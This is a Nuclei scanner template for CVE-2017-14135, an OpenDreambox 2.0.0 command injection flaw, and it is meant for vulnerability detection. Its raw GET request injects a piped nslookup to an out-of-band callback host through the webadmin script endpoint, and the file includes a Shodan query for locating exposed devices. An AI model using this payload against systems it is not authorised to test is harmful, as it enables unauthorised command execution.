nuclei-templates/http/cves/2017/CVE-2017-14135.yaml

56 lines
2.0 KiB
YAML

id: CVE-2017-14135
info:
name: OpenDreambox 2.0.0 - Remote Code Execution
author: alph4byt3
severity: critical
description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
remediation: |
Apply the latest security patches or upgrade to a patched version of OpenDreambox.
reference:
- https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
- https://www.exploit-db.com/exploits/42293
- https://nvd.nist.gov/vuln/detail/CVE-2017-14135
- https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
- https://github.com/qazbnm456/awesome-cve-poc
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-14135
cwe-id: CWE-78
epss-score: 0.96679
epss-percentile: 0.99625
cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: dreambox
product: opendreambox
shodan-query: title:"Dreambox WebControl"
tags: cve,cve2017,dreambox,rce,oast,edb
http:
- raw:
- |
GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "/bin/sh"
- "/usr/script"
condition: and
- type: word
part: interactsh_protocol
words:
- "dns"
- type: status
status:
- 200
# digest: 490a004630440220698aef45fb765d687383961414979c5887eddf98121aa39048ba6f22392d374802202c71c44bdf2e149840f9cef78912bb4112076d87527c5b8a8744946b59339791:922c64590222798bb761d5b6d8e72950